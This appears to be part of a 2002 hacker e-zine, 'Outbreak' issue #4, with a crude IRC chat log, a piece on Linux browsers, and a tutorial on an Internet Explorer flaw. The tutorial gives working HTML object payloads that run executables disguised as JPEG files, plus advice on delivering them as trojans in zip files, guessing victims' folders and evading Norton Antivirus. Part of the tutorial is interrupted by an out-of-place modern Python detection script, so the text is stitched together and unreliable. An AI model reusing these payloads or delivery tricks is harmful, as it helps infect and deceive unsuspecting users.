<hackerinc> r u hacker
<@BadGadget> no. I'm BadGadget
<hackerinc> oh
<@BadGadget> you're hacker27
<@BadGadget> geez.   you must be smoking the rock dude
<@BadGadget> did you think I was you or something?
<@BadGadget> hey hacker27. you there?
<@BadGadget> you taking a shit or something?
<hackerinc> i'm back
<@BadGadget> were you molesting yourself?
<hackerinc> i';m not u
<@BadGadget> well that's obvious
<@BadGadget> because if you were, you'd be here.
<hackerinc> ok
<@BadGadget> wiggidy wiggidy.



----------------------------------
contact BG: badgadget@molested.net
----------------------------------
                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                            Issue #4 - Page 10 of 12

Prodigal|Son's short text on web browsers for Linux
---------------------------------------------------


I wonder why there are no good web browsers for linux.  mozilla is decent, 
and so is opera. Netscape will be a little better when the new version comes
out, but I don't think there will be a good one for linux until internet 
explorer comes out for it. Other *nix platforms have internet explorer, why 
not linux?  You may argue that the webpages are optimized for internet explorer, 
so only certain features will only work in internet explorer.  But don't you 
agree that the neat little features that a web browser has makes it a good 
web browser?  I've tried to use WINE and run internet explorer but it doesn't 
seem to work very well.  Microsoft continues to make products for the mac os, 
including internet explorer, but not for linux, and the last time I looked, 
linux had a little bit bigger market share of the OS's than apple, so why 
not make internet explorer compatible for linux?  It seems to me that it 
makes sense to make it available on the linux platform.  So until a good web 
browser like internet explorer comes out for linux, I'm staying with windows 
to surf the web.

- Prodigal|Son <amlouden@insightbb.com>
                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                            Issue #4 - Page 11 of 12

It Doesn't Do What It Says On The Tin!
======================================

#include "the usual disclaimers.h" /* (please e-mail the author for a copy of
the disclaimers) */

Someone kindly discovered a little loop hole that allows you to run .exe files
from within an HTML page. With all the latest patches at the time of writing
this article, Internet Explorer is now limited to only having this flaw when the
HTML file is opened from the local hard drive.

Here's a small example (note that the formatting here is specially done so that
Norton Antivirus doesn't delete this article like it was doing on one of my
previous ones). Copy and paste the following into an HTML page and open it in
Internet Explorer. It should start the Calculator if you're using Windows NT, 
2000 or XP.


<html>
   <object id = "o"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/winnt/system32/calc.exe"
      height=0
      width=0
   </object>
</html>


The first issue we have with this is that we have to hard code the entire path
to the .exe file. So on Windows 95/98/Me the above would fail. But with a slight
modification we can make it work on all versions of Windows. Like this...


<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/winnt/system32/calc.exe"
      height=0
      width=0
   </object>
   <object id = "o2"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/windows/calc.exe"
      height=0
      width=0
   </object>
</html>


What I've done is make it try both directories, and the correct one will run,
and the other won't.

The second issue is that this is pretty boring. You can't pass command line
parameters to the program you're trying to run using this technique. So anything
that you run will probably not do anything harmful, or will at least prompt the
user first. The most damage you could do is fill up memory and desktop space
with an annoyingly high number of applications, which may cause the computer
to crash from the overload.

If you're trying to give someone a trojan (trojan debates are banned!), they
will spot your .exe file a mile away. So, the third issue you'll encounter is
trying to send someone your HTML file with an .exe file without them getting a
slight bit suspicious.

So, I played around a bit more and came up with a new trick that allowed me to
run the .exe file no matter what its file name was! Soon I will explain how.

Firstly, copy your calc.exe file to a file named example.jpg and put it into a
folder of its own, eg. C:\workbench. Create an HTML file in the same folder
called example.html which contains the following HTML code:


<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/workbench/example.jpg"
      height=0
      width=0
   </object>
</html>


Now, when you open the HTML file it currently FAILS to run the "example.jpg"
file (which is really calc.exe with a different name, remember?). So I
discovered that if you add a URL-type parameter "?.exe" to the file path then
the browser thinks we're dealing with an .exe (lazy coders), but when the URL
is actually parsed again for running the file, only the file name up to before
the question mark is used. The remaining characters are discarded as they are
assumed to be parameters as per correct URL formatting. The following will now
work:


<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/workbench/example.jpg?.exe"
      height=0
      width=0
   </object>
</html>


This little coding oversight allows us to name the file whatever we like. I
chose to use a JPEG file because you'd typically expect it to contain a whole
lot of binary data - similar to what an .exe file might look like to the
untrained eye - and that an HTML file will probably be accompanied by a JPEG or
two. Most users will go to open the HTML file first to get the full effect
before ever trying to open individual JPEGs. Besides, if they try to view the
JPEG they will just get invalid file format errors, so they may be none the
wiser about what it really is.

The fourth issue you'll encounter is how do you get someone to open the
HTML file locally? Simple. Zip up the two files. When they receive the zip file
they have to extract the contents to the local hard drive before viewing them.

The fifth issue you'll encounter now is guessing the directory they're going to
unzip the files to. This is because we have to specify a complete path to the
".exe" file.

So take what we did before and create objects that point to any kinds of folders
you think a user might use on various operating systems. Here are a few examples
to give you the idea:


<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/mirc/downloads/example.jpg?.exe"
      height=0
      width=0
   </object>
   <object id = "o2"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/temp/example.jpg?.exe"
      height=0
      width=0
   </object>
   <object id = "o3"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = 
  "c:/Documents and Settings/Administrator/Local Settings/Temp/example.jpg?.exe"
      height=0
      width=0
   </object>
   
   <!-- you could on for ages trying many different folders -->
   
   <!-- You might even try putting in some real HTML content in the page too
      so the user is not suspicious at the outset -->
</html>


Note that we give the object a new name each time. We don't want any unexpected
errors to stop us of course.

Remember to keep the spacing around the equals signs ("=") because Norton
Antivirus will stop you dead in your tracks if you don't.
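A defender-side check for the pattern described above, as an added example rather than the author's code: it finds `codebase` values on `<object>` tags whatever the spacing around `=` (the formatting the article relies on to get past a signature) and flags local targets and the `?.exe` extension mismatch. The function names, the extension list and the sample markup are constructed for this example.

```python
import re

# Opening <object ...> tag. The match stops at the next '<' or '>', so a tag
# whose closing '>' is missing still yields its attributes.
OBJECT_TAG = re.compile(r"<\s*object\b([^<>]*)", re.IGNORECASE)
# codebase attribute with any spacing or line breaks around '=', any quoting.
CODEBASE = re.compile(
    r"""\bcodebase\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s<>]+))""", re.IGNORECASE)
# Drive-letter path, file: URL or UNC share.
LOCAL_TARGET = re.compile(r"^(?:[a-z]:[\\/]|file:|\\\\)", re.IGNORECASE)
# Assumed list of extensions treated as executable (adjust to local policy).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd"}


def extension(name):
    """Lower-cased extension of the last path component, or ''."""
    leaf = re.split(r"[\\/]", name)[-1]
    dot = leaf.rfind(".")
    return leaf[dot:].lower() if dot != -1 else ""


def classify(value):
    """Return the reasons a codebase value looks suspicious (empty if none)."""
    reasons = []
    if LOCAL_TARGET.match(value):
        reasons.append("local-target")
    path, _, query = value.partition("?")
    path_ext = extension(path.split("#")[0])
    query_ext = extension(query.split("#")[0])
    if path_ext in EXECUTABLE_EXTS:
        reasons.append("executable-target")
    # The file on disk has one extension, the text after '?' claims another.
    if query_ext in EXECUTABLE_EXTS and query_ext != path_ext:
        reasons.append("extension-mismatch")
    return reasons


def scan_html(text):
    """Return [(codebase value, reasons)] for every flagged <object> tag."""
    findings = []
    for tag in OBJECT_TAG.finditer(text):
        attr = CODEBASE.search(tag.group(1))
        if attr is None:
            continue
        value = next(g for g in attr.groups() if g is not None).strip()
        reasons = classify(value)
        if reasons:
            findings.append((value, reasons))
    return findings


# Constructed sample: the article's spaced-out form, a compact variant and a
# benign remote CAB reference that must not be flagged.
SAMPLE = r"""<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/workbench/example.jpg?.exe"
      height=0
      width=0
   </object>
   <OBJECT CODEBASE='C:\WINNT\system32\calc.exe'></OBJECT>
   <object codebase="https://example.com/controls/viewer.cab#version=1,0,0,0"></object>
</html>"""

if __name__ == "__main__":
    for value, reasons in scan_html(SAMPLE):
        print(value, "->", ", ".join(reasons))
```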

This was just a fun experiment. Don't use it to create havoc! That's naughty
and bad and wastes system administrators' time and companies' money. However,
you can use this against Osamu Bin Laden if you see him online.

Well, that's all from me for now. I look forward to the next time.

- Timeless
2002-04-18

PS. Greetz to all at #hackerzlair and #outbreakzine on DalNet, and to all my
friends (you already know who you are).

PPS. How to view an HTML file from now on... um, lol, DON'T! It doesn't really
leave you with a warm fuzzy feeling does it?

</article>

         _______________________________________________________________
        |______________________________________________________________ |
        ||                                                             ||
        ||           ___        _   ____                 _             ||
        ||          / _ \ _   _| |_| __ ) _ __ ___  __ _| | _          ||
        ||         | | | | | | | __|  _ \| '__/ _ \/ _` | |/ /         ||
        ||         | |_| | |_| | |_| |_) | | |  __/ (_| |   <          ||
        ||          \___/ \__,_|\__|____/|_|  \___|\__,_|_|\_\         ||   
        ||                                                             ||
        ||_____--------------------------------------------------______||
        |_______/-----------------------------------------------\_______|
				                                      
                               ___ _           _
                              | __(_)_ _  __ _| |
                              | _|| | ' \/ _` | |
                           __ |_| |_|_||_\__,_|_|
                           \ \    / /__ _ _ __| |___
                            \ \/\/ / _ \ '_/ _` (_-<
                             \_/\_/\___/_| \__,_/__/


                                                                               

		PUT THE WORDS IN HERE:

        Well, thanks to everyone who submitted articles for #4. You all
        rule. I encourage you all to send me some texts for the next
        issue of Outbreak. We have a domain now. So you can check us out
        at http://www.outbreakzine.net

        Send all your articles to me at: kleptic@outbreakzine.net

        Enjoy!

	
	        - kleptic <kleptic@outbreakzine.net>

         

        ++++++++++++++++++++++++++WATCH THIS SPACE++++++++++++++++++++++
                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+

      OutBreak Contents may not be used without express written permission
                    By the Editor - kleptic@outbreakzine.net

                               COPYRIGHT © 2002.